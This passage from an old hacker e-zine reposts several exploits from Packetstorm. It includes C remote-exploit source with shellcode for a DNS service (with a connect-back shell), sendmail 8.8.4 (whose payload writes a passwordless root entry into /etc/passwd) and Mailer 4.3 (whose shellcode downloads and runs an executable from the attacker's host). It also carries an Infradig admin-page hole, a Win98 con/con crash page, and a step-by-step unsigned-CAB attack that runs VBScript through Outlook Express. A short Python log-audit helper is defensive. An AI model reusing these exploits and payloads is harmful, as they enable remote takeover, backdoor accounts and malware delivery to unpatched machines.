          PUTADRH(&asmcode[0xb0-20+2+4],ltmp);
          PUTADRL(&asmcode[0xb4-20+2+4],ltmp);
          ltmp=local.sin_addr.s_addr;
          PUTADR(&asmcode[0xdc-20],ltmp);
          ltmp=local.sin_port;
          PUTADRL(&asmcode[0xda-20],ltmp);
      
          size=930;
          tablica[0]=(size+23)>>8;
          tablica[1]=(size+23)&0xff;
          tablica[23]=size>>8;
          tablica[24]=size&0xff;
      
          if((b=(char*)malloc(10500))==NULL) return(-1);
          memset(b,0,10500);
          bcopy(tablica,b,sizeof(tablica));
      
          for(i=0;i<sizeof(asmcode);i++)
            b[2+32+i]=asmcode[i];
          for(i=0;i<4;i++){
            b[2+200+420+i]=start[i];
            b[2+200+420+420+i]=regt9[i];
            b[1018+i]=reggp[i];
            b[930+i]=bcop7[i];
            b[1018-(7*8+4)+i]=regt9[i];
          }
          b[968]=0x20;
          b[528]=0x08;
      
          sck=socket(AF_INET,SOCK_STREAM,0);
      
          bzero(&address,sizeof(address));
          address.sin_family=AF_INET;
          address.sin_port=htons(53);
          if((address.sin_addr.s_addr=inet_addr(argv[3]))==-1){
              if((hp=gethostbyname(argv[3]))==NULL){
                  printf("error: address.\n");exit(-1);
              }
              memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
          }
      
      
          if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
              perror("error");exit(-1);
          }
          fflush(stdout);
      
          write(sck,b,25+size);
          close(sck);
      
          size=10000;
          b[0]=(size+23)>>8;
          b[1]=(size+23)&0xff;
          b[23]=size>>8;
          b[24]=size&0xff;
      
          sck=socket(AF_INET,SOCK_STREAM,0);
          sleep(1);
          if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
              perror("error");exit(-1);
          }
          fflush(stdout);
          write(sck,b,25+size);
          close(sck);
      
          listen(srvsck,5);
          srvsck=accept(srvsck,(struct sockaddr*)&local,&i);
          printf("%s successfully exploited\n",argv[3]); 
          fflush(stdout);
          while(1){
              FD_ZERO(&readfs);
              FD_SET(0,&readfs);
              FD_SET(srvsck,&readfs);   
              if(select(FD_SETSIZE,&readfs,NULL,NULL,NULL)){
                  int cnt;
                  char buf[1024];
                  if(FD_ISSET(0,&readfs)){
                      if((cnt=read(0,buf,1024))<1){
                          if(errno==EWOULDBLOCK||errno==EAGAIN) continue; 
                          else {printf("koniec.\n");exit(-1);}
                      }
                      write(srvsck,buf,cnt);
                  }
                  if(FD_ISSET(srvsck,&readfs)){
                      if((cnt=read(srvsck,buf,1024))<1){
                          if(errno==EWOULDBLOCK||errno==EAGAIN) continue; 
                          else {printf("koniec.\n");exit(-1);}
                      }
                      write(1,buf,cnt);
                  }
              }
          }
         free(b);
         close(srvsck);
      }
      /*                    www.hack.co.za                    */

      @HWA            
      
179.0 FreeBSD Sendmail 8.8.4 mime 7to8 remote exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm
      
      More old stuff? anyone still use 8.8.* ??
      
      /*
        sendmail 8.8.4, freebsd, mime 7to8, remote 
        I checked this only at home, at custom installed 8.8.4.
        I have no freebsd with preinstalled 8.8.4 around.
        change cmd[] below to shell command you want, and throw output to sendmail
       */
      
      #include <stdlib.h>
      #include <fcntl.h>
      
      #define BUFSIZE 6100
      #define OFFS -5000
      #define ALIGN 0
      #define ADDRS 15
      
      int get_sp(void) {
      /* __asm__(" movl       %esp,%eax"); */
        return 0xefbf95e4;
      }
      
      /* up to 220 bytes */
      char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";
      
      char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
                "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
                "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
                "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
                "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
                "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
                "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
                "\x68\x2e\x2d\x63\x2e";
      
      char nop[]="\x90";
      
      char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
      
      void run(unsigned char *buf) {
        unsigned int i, j, k;
      
        printf("MIME-Version: 1.0\n");
        printf("Content-Type: text/plain\n"); 
        printf("Content-Transfer-Encoding: base64\n");
      
        k=strlen(buf) / 3 * 3;
        for (i=0; i < k; i+=3) {
          j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
          if (i % 54 == 0)
            printf("\n");
          printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
          printf("%c", Base64Table[(j & 0x03f000) >> 12]);
          printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
          printf("%c", Base64Table[j & 0x00003f]);
        }
        switch (strlen(buf) - k) {
          case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2], 
                         Base64Table[(buf[k] & 0x3) << 4]);
              break;
          case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2], 
                         Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
                         Base64Table[(buf[k+1] & 0xf) << 2]);
              break;
          default:
        }
        printf("\n");
      }
      
      char code[sizeof(asmcode) + sizeof(cmd)];
      
      main(int argc, char *argv[]) {
        char *buf, *ptr, addr[8];
        int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
        int i, noplen=strlen(nop);
      
        if (argc >1) bufsize=atoi(argv[1]);
        if (argc >2) offs=atoi(argv[2]);
        if (argc >3) addrs=atoi(argv[3]);
      
        strcpy(code, asmcode);
        strncat(code, cmd);
        strncat(code, ".");
        code[41]=0x1a+strlen(cmd)+1;
      
        if (bufsize<strlen(code)) {
          printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
          exit(1);
        }
        if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) {
          printf("Can't malloc\n");
          exit(1);
        }
        *(int *)addr=get_sp()+offs;
        printf("address - %p\n", *(int *)addr); 
        ptr=buf;
        for (i=0; i<bufsize; i++) 
          *ptr++=nop[i % noplen];
        memcpy(ptr-strlen(code), code, strlen(code));
        for (i=0; i<addrs<<2; i++) 
          *ptr++=addr[i % sizeof(int)];               
        *ptr=0;
        printf("total buf len - %d\n", strlen(buf)); 
      
        run(buf);
      }
      /*                       www.hack.co.za                    */
      
      @HWA      
      
180.0 Infradig 1.225 for Windows remote security hole 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm

      "The administration server on port 81 allows anyone to edit
      accounts, add users, and set all kinds of things."        
      
      +++>===] Written by Nemesystm, leader of the DHC [===<+++
      ++++>==]   Visit us at dhc1.cjb.net You want 2   [==<++++
      
      Subject: Infradig 1.225 Security Hole
      Description program: Infradig is a HTTP Server with a Mail daemon, etc.
      Description hole: There are no restrictions on the online administration bit of the server software.
      
      <-[what was used]->
      Infradig 1.225 for Windows 95/98 downloaded from cnet.com
      Installed with the typical installation, no standard settings changed.
      This problem worked on: Windows 98 + IE5.0
      
      <-[how to create the problem]->
      The administration service runs on port 81 (as a default, can be set). Connecting to: http://www.server.com:81/sysadmin/sysadmin.cgi will let you edit accounts, add users, set all kinds of things like ports, and start services. (FTP, etc)
      On the HTTP server, you can go to http://www.server.com/sysadmin/ and it will/should automatically refer you to the administration service.
      
      <-[logs]->
      When you go to the administration page, your IP is logged. You can find the logs in programdir\logs.
      It also has what you do, and what browser you used.
      
      <-[fix]->
      Delete: program dir\inetpub\sysadmin\*.*
              program dir\inetpub\mailadmin\*.*
      Change all user things, etc, by rightclicking the server icon in the bottom right corner of the screen and choosing "Manual configure"
      
      Greetz,
      nemesystm, leader of the DHC (dhc1.cjb.net)
      
                                      >>>The End<<<
      auto45040@hushmail.com for questions.
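
      The check implied by the advisory's fix and logs sections, as an added
      example that is not part of the original advisory or of Infradig: it lists
      any files still present under the two admin directories and flags requests
      for the admin pages from untrusted addresses. The log layout, the /mailadmin
      URL prefix, the function names and the sample lines are assumptions
      constructed for illustration.

```python
"""Audit helper for the Infradig 1.225 admin-page exposure (added example)."""
import re
from collections import defaultdict
from pathlib import Path
from urllib.parse import unquote

# Directories the advisory's fix says to empty, relative to the install directory.
ADMIN_DIRS = ("inetpub/sysadmin", "inetpub/mailadmin")
# URL prefixes treated as administrative. /sysadmin comes from the advisory;
# /mailadmin is an ASSUMPTION made by analogy with the directory name.
ADMIN_URL_PREFIXES = ("/sysadmin", "/mailadmin")

# ASSUMED log layout (the advisory only says IP, action and browser are logged):
#   <ip> [<timestamp>] "<METHOD> <target>" "<browser>"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log using documentation address ranges.
SAMPLE_LOG = """\
192.0.2.10 [2000-02-20 10:01:07] "GET /index.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
203.0.113.77 [2000-02-20 10:02:44] "GET /sysadmin/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
203.0.113.77 [2000-02-20 10:02:45] "GET /sysadmin/sysadmin.cgi" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
203.0.113.77 [2000-02-20 10:03:10] "POST /SysAdmin/sysadmin.cgi?page=users" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
198.51.100.5 [2000-02-20 10:05:00] "GET /%73ysadmin/sysadmin.cgi" "Mozilla/4.7 [en] (Win98; I)"
127.0.0.1 [2000-02-20 10:06:00] "GET /sysadmin/sysadmin.cgi" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
garbage line that does not parse
"""


def remaining_admin_files(install_dir):
    """Return files still under the admin directories; an empty list means the fix is applied."""
    root = Path(install_dir)
    found = []
    for rel in ADMIN_DIRS:
        directory = root / rel
        if directory.is_dir():
            found.extend(
                p.relative_to(root).as_posix() for p in directory.rglob("*") if p.is_file()
            )
    return sorted(found)


def normalise(target):
    """Reduce a request target to a comparable path.

    Drops the query string, decodes %xx escapes, unifies slashes and lower-cases,
    because Windows file names are case-insensitive and /SysAdmin/ reaches the
    same files as /sysadmin/.
    """
    path = unquote(target.split("?", 1)[0]).replace("\\", "/").lower()
    return re.sub(r"/+", "/", path)


def is_admin_path(path):
    """True when a normalised path is an admin prefix or lies beneath one."""
    return any(path == p or path.startswith(p + "/") for p in ADMIN_URL_PREFIXES)


def admin_hits(log_lines, trusted_ips=frozenset()):
    """Group admin-page requests by client address.

    Returns (hits, unparsed): hits maps ip -> [(timestamp, method, path), ...];
    unparsed collects lines that did not match, so they are reviewed, not dropped.
    """
    hits = defaultdict(list)
    unparsed = []
    for raw in log_lines:
        line = raw.strip()
        if not line:
            continue
        m = LOG_LINE.match(line)
        if m is None:
            unparsed.append(line)
            continue
        path = normalise(m["target"])
        if is_admin_path(path) and m["ip"] not in trusted_ips:
            hits[m["ip"]].append((m["ts"], m["method"], path))
    return dict(hits), unparsed


if __name__ == "__main__":
    hits, unparsed = admin_hits(SAMPLE_LOG.splitlines(), trusted_ips={"127.0.0.1"})
    for ip, events in sorted(hits.items()):
        print(f"{ip}: {len(events)} admin request(s)")
        for ts, method, path in events:
            print(f"    {ts} {method} {path}")
    print(f"{len(unparsed)} line(s) did not parse and need manual review")
```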
      
      @HWA
      
181.0 Remote exploit for Mailer 4.3 - Win 9x/NT. By Cybz     
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm
      
      /*
      
         Remote exploit for Mailer 4.3 - Win 9x/NT (PRIVATE DO NOT DISTRIBUTE)
         Author: Cybz    (8. dec '99)
         Try offsets +600 to +800
      
      */
      
      
      #include <stdio.h>
      #include <string.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <sys/time.h>
      #include <unistd.h>
      
      #define BUF_SIZE        3412
      #define PORT            110
      #define OFFSET          674
      
      char shellcode[701] = {
         0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88,
         0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35,
         0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88,
         0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF,
         0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50,
         0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9,
         0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
         0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF,
         0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0,
         0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,
         0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF,
         0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66,
         0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56,
         0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,
         0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,
         0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1,
         0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,
         0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
         0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1,
         0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,
         0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77,
         0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7,
         0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,
         0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7,
         0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33,
         0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,
         0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50,
         0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,
         0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
         0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
         0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
         0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D,
         0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33,
         0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70,
         0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C,
         0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74,
         0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63,
         0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79,
         0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00 };
      
      
      int     main(int argc,char *argv[])
      {
              char buf[BUF_SIZE];
              struct hostent *info;
              struct sockaddr_in server;
              int fd,i;
              unsigned int ip,port,yourip;
      
              if (argc < 3) {
                  printf("usage: %s <victim> <you>\n", argv[0]);
                  exit(1);
              }
      
              if ((yourip=inet_addr(argv[2]))==-1){
                  if ((info=gethostbyname(argv[2]))==NULL){
                      printf("Unable to resolve local hostname.\n");
                      exit(1);
                  }
                  memcpy((caddr_t)&yourip,info->h_addr,info->h_length);
              }
      
              bzero(&server, sizeof(server));
              server.sin_family = AF_INET;
              server.sin_port = htons(PORT);
              if ((server.sin_addr.s_addr=inet_addr(argv[1]))==-1){
                  if ((info=gethostbyname(argv[1]))==NULL){
                      printf("Can not resolve specified VictimHost.\n");
                      exit(1);
                  }
                  server.sin_family = info->h_addrtype;
                  memcpy((caddr_t)&server.sin_addr.s_addr,info->h_addr,info->h_length);
              }
      
              if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                  perror("socket");  exit(0);
              }
      
              if(connect(fd, (struct sockaddr *)&server, sizeof(server)) < 0){
                  perror("connect"); exit(0);
              }
              while((i=read(fd,buf,sizeof(buf))) > 0){
                  buf[i]=0;
                  if(strchr(buf,'\n')!=NULL) break;
              }
              memset(buf,0x90,BUF_SIZE);
              for (i=267;i<271;i++) buf[i]=0x30;
      
              ip=htonl(yourip);
              memcpy(buf+OFFSET+4,shellcode,strlen(shellcode));
      
              buf[BUF_SIZE]=0;
              sprintf(buf,"RCPT TO: %s\r\n",buf);
              write(fd,buf,strlen(buf));
              close(fd);
      }
      /*                        www.hack.co.za                    */
      
      @HWA      
      
             
182.0 Variation of the win98 con exploit that crashes netscape as well.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Other variations exist to crash other Win9* Win2* programs, see
      elsewhere in this issue. - Ed
      
      
      Source: Packetstorm
      
      The Windows 98 "Con" exploit 
      
      Although reading various advisories and documents concerning the /con/con 
      exploit, no one has posted it as a hyperlink yet. Some authors did post it like this: 
      
      <HTML> 
      <BODY> 
      <IMG SRC="c:\con\con"> 
      </BODY> 
      </HTML> 
      
      But an author has mentioned that Netscape was not affected (with the
      example mentioned above); that's very true "if" applied using the method
      mentioned above. But I've tested on my own IE 5.0 and it didn't seem to
      affect it either. So I've tried putting it like this in an html file: 
      
      <HTML> 
      <BODY> 
      <A HREF="file:///C|/con/con"> 
      </BODY> 
      </HTML> 
      
      Click here to test it. 
      NOTE: THIS MIGHT CAUSE YOUR COMPUTER TO LOCK UP/CRASH, TRY AT OWN RISK. 
      
      And that seems to have affected IE AND Netscape browsers running on Win98 OS. 
      Haven't tested with other browsers yet, so any feedback would be appreciated. 
      
      Neon-Lenz 
      neonlenz@hackermail.net 
      
      @HWA    
      
183.0 Microsoft unsigned .CAB exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm
      

               Vulnerability details and example exploit
                  for Microsoft Active Setup control's
               unsigned CAB file execution vulnerability.
   
     Introduction
     
     Microsoft's Active Setup Control (asctrls.ocx) shipped with
     Internet Explorer 4 and above has a vulnerability in it as
     discovered by Juan Carlos Garcia Cuartango
     <cuartango@teleline.es>, which was posted on BUGTRAQ (ID 775)
     in the month of November, 1999. Microsoft has released patches
     for its control which may be procured from its website. This
     document aims to provide the actual details of the
     vulnerability as well as an example exploit.
     
     NOTE: This is NOT a document on the Microsoft signed software
     backdoor vulnerability as posted on BUGTRAQ (ID 999) in
     February 2000.
     
     Disclaimer
     
     The material in this document is released AS IS for EDUCATIONAL
     PURPOSES ONLY. This document may be used by security analysers
     to monitor how probable crackers may intrude into their
     systems. The author of this document does not wish to give his
     opinion on supporting or criticizing vulnerability analysis.
     You are advised against using any of the material in this
     document for criminal purposes.
     
     All responsibility of action, pros, cons, the cause and effect
     of your action, is on you. You are responsible for EVERYTHING.
     The author is in no way responsible for any sort of action
     which is caused by the material in this document. YOU ARE ON
     YOUR OWN.
     
     Vulnerability Details
     
     On November 8th 1999, a public announcement was made that a
     severe vulnerability existed in Microsoft's Active Setup
     control which was shipped with Internet Explorer 4 and above.
     The vulnerability was so severe that almost any kind of
     break-in was possible into client machines. Email bombs,
     viruses, criminal acts such as gathering of secret documents,
     etc. are all very possible with such a security hole.
     
     Microsoft was quick to release a security bulletin and make
     patches available on its website. Nobody apart from Microsoft
     and Juan Carlos Garcia Cuartango knew how to exploit the
     vulnerability and the whole world was a safer place. Not many
     knew how to use the Active Setup control as not much
     information was released to the public about the control. Now
     that it's been quite a while since patches have been made
     available, I have decided to release an example exploit to
     implicitly explain what kind of security measures have to be
     deployed.
     
     The Active Setup control has a vulnerability which allows the
     installation of software from unsigned local CAB files. By
     local files, I mean CAB files on the client machine (as opposed
     to on the Internet). No checking is done and the contents of
     the cabinet file are trusted. This is the vulnerability.
     
     For details on the Active Setup process and using the
     component, please refer to the links provided at the end of
     this document. In short words, the Active Setup control is a
     software component (which may be used in other
     programs/scripts) to install software. The Active Setup control
     is used through function calls in the program/script code. An
     input CAB file contains a list of installation files (including
     executable files) and a cabinet information file (CIF) which
     describes what is to be done with the CAB file.
     
     Exploit Details
     
     PLEASE READ THE DOCUMENTATION ON THE ACTIVE SETUP CONTROL
     (given in links below).
     
     We now examine how this bug may be exploited. Supposing we are
     able to store an unsigned CAB on the client machine, it becomes
     local to the client. Hence, we may process the unsigned CAB
     file using the Active Setup control successfully. We may use an
     HTML file with VBScript in it to run the control. VBScript has
     support for ActiveX controls (Active Setup is an ActiveX
     control). The VBScript is invoked when the HTML file loads. The
     VBScript then initializes the control with details of where the
     CAB file is present on the client machine, and asks the control
     to process the CAB file. The Active Setup control then
     processes the CAB file, and executes EXE programs archived in
     the CAB file with NO SECURITY LIMITATIONS. The EXE program may
     then do anything it wishes to do.
     
     Now, obviously, there are questions in your head. How do I
     transfer a CAB file onto the client's machine? The answer is
     simple. The client user is not mad to download an unsigned CAB
     file. So you may disguise it as a file of another format (in
     short words, rename the file's extension). Now, what types of
     files are implicitly downloaded? HTML, GIF, JPG, etc. which
     make up a page are downloaded when the user visits a site using
     Internet Explorer. But these files are stored in temporary
     directories. Although a CAB file disguised as a JPG file will
     download onto the local client, where will it be stored? The
     location is not fixed. When the location can be determined, we
     may be able to write an exploit for Internet Explorer. But
     until then, there are other options.
     
     Hey, what about Outlook Express? Too many people have told me,
     "DON'T USE OUTLOOK EXPRESS! It's too intelligent." They are
     right I guess. Outlook Express uses components of Internet
     Explorer to handle HTML files. So you can display HTML messages
     in Outlook Express. More important, YOU CAN RUN VBSCRIPTS in
     Outlook Express.
     
     How is it going to help? SIMPLE. I attach a file called "x.jpg"
     to an email and send it to the client, and the client downloads
     it using Outlook Express. When he/she VIEWS THE EMAIL (when
     he/she clicks on the subject in the message window), Outlook
     Express tries to display the attached "x.jpg" file as a JPEG
     attachment. For this, it saves the JPEG file in the directory
     pointed by the environment variable TEMP. This is mapped to
     C:\WINDOWS\TEMP on most machines. So, "x.jpg" is saved as
     "C:\WINDOWS\TEMP\x.jpg". Now, if I create a CAB file (with my
     malicious EXE program in it) and rename it to "x.jpg" and
     attach it to an email message, it will go to the same location.
     Outlook Express will fail to display the file (will show an
     icon with "X" instead). So, I now know the location of the CAB
     file on the client machine. I can also execute VBScript from
     the same email message (which contains HTML), which will then
     create and initialize the Active Setup control to install from
     the local file (C:\WINDOWS\TEMP\x.jpg). The Active Setup
     control does not mind the different file extension. Then, when
     the VBScript asks the control to process the components of the
     CAB file, the malicious EXE program can execute.
     
     Practical Demonstration
     
     First, let us build the CAB file. We have the executable EXE
     program which has to be executed on the target machine. Let's
     call it ASDF.EXE. This ASDF.EXE could be a non-interactive
     program which runs silently (as in a real life cracking
     scenario) without any visual indication of it running. For our
     example we may make a copy of NOTEPAD.EXE and call it ASDF.EXE.
     
     Now, we need to put another file into the CAB. It is a cabinet
     information file (CIF). An example file is given as follows
     (with comments). More on creating this file, and fields you can
     put in it, is present in a description of the Active Setup
     control given in one of the links at the end of this document.
     
     ; Start of ASDF.CIF (note: semicolon is for comment)
     ; Anything in [] means a section
     [Version]
     Signature=$Chicago$
     ; DisplayName gives the name that the Active Setup
     ; control displays when it tries to install the component
     ; (if you ask it to display progress indicators, etc.)
     DisplayName=Active Setup Control Sample Exploit
     ;Require 1MB of free space to start
     MinFileSize=1000
     ; [ASDF] is a section devoted to the dummy
     ; ASDF component we will fake installing.
     [ASDF]
     ; Guess you know this already.
     DisplayName=ASDF Sample Main Module
     ; GUID is a unique ID.. guess something unique will do.
     GUID={AABBCCDD-B00B-FACE-DADA-00AA00BB00CC}
     ; URLn point to URLs of various CAB files. Our CAB file
     ; will eventually be disguised (renamed) as a JPG file
     ; and be stored in "asdf.jpg". so there.
     URL1="ascb.jpg",3
     ; Sizen = compressed/actual size of installation files on disk?
     ; A dummy value greater than size of "ASDF.EXE" should do.
     Size1=1417,1430
     ; This is important. Commandn gives the name of the
     ; command (in the CAB file) to execute when installation
     ; starts. This will be our EXE file.
     Command1="asdf.exe"
     ; Type of installation. This field is described in the
     ; documentation for the Active Setup control.
     Type1=2
     Version=1,00,1234,0
     ; 0 = no reboot, 1 = reboot.
     ; obviously, DON'T REBOOT AFTER INSTALLATION IS COMPLETE!
     Reboot=0
     ; Space occupied by the installed files. A dummy value
     ; greater than size of "ASDF.EXE" should do.
     InstalledSize=980,524
     ; End of ASDF.CIF
     
     We now need a program to create the CAB archive which will
     contain the two files ASDF.EXE and ASDF.CIF. MAKECAB.EXE, which
     is included with Microsoft Visual Studio distributions doesn't
     seem to be able to handle more than one file inside the CAB
     archive. You may try a shareware program like Archive Explorer
     available from http://www.dennisre.com/ax/ to create your CAB
     files.
     
     Once your CAB file is created (containing ASDF.EXE and
     ASDF.CIF), rename the CAB file to ASDF.JPG. Now, the CAB file
     is ready. Let's move on to the VBScript part.
     
     Create an HTML file with the following contents. The contents
     are described with comments in the file itself. No further
     explanation should be necessary.
     
     <!-- Start of HTML code -->
     <HTML>
     <HEAD>
     <TITLE>Hi</TITLE>
     </HEAD>
     <!-- On loading, we execute the VBScript function TryInstall()
     -->
     <BODY OnLoad="TryInstall()">
     <!--
     Create an object with the following classid. The classid
     is for the HKEY_CLASSES_ROOT\ASControls.InstallEngineCtl
     and can be verified using REGEDIT.EXE. Call the object "Inst".
     This is our Active Setup control we will exploit.
     -->
     <object id="Inst"
     classid="CLSID:6E449683-C509-11CF-AAFA-00AA00B6015C">
     </object>
     <script language="VBScript">
     <!--
     Sub TryInstall()
     'Set the BaseUrl to C:\WINDOWS\TEMP
     'and the CIF file to ASDF.CIF which is inside
     'ASDF.JPG (which is actually the renamed CAB file).
     'This is because Outlook Express will save the asdf.jpg
     'file in C:\WINDOWS\TEMP on most systems.
     Inst.BaseUrl = "file:///C:/Windows/Temp"
     Inst.SetCifFile "asdf.jpg", "asdf.cif"
     'Now, the installation engine of the Active Setup control
     'will unpack the CAB file and initialize itself with details
     'from the included CIF file. But this takes TIME. If this were
     'Visual Basic, we could have polled Inst.EngineStatus in a loop
     'with a DoEvents in it. But this won't work in VBScript.
     'So we will introduce a delay for the engine to initialize itself.
     'There is no Sleep() function in VBScript :(
     '
     'We can simulate a 1/2 second sleep using the following workaround
     'by splitting up our code into two functions.
     x = SetTimeout("DoRest",500,"VBScript")
     End Sub
     Sub DoRest()
     'Ah! 1/2 second has passed. So has the engine initialized itself?
     If Inst.EngineStatus <> 3 Then
     'Uh oh! We have a problem if EngineStatus <> 3! If you have followed
     'instructions correctly, this would mean that the 1/2 second delay
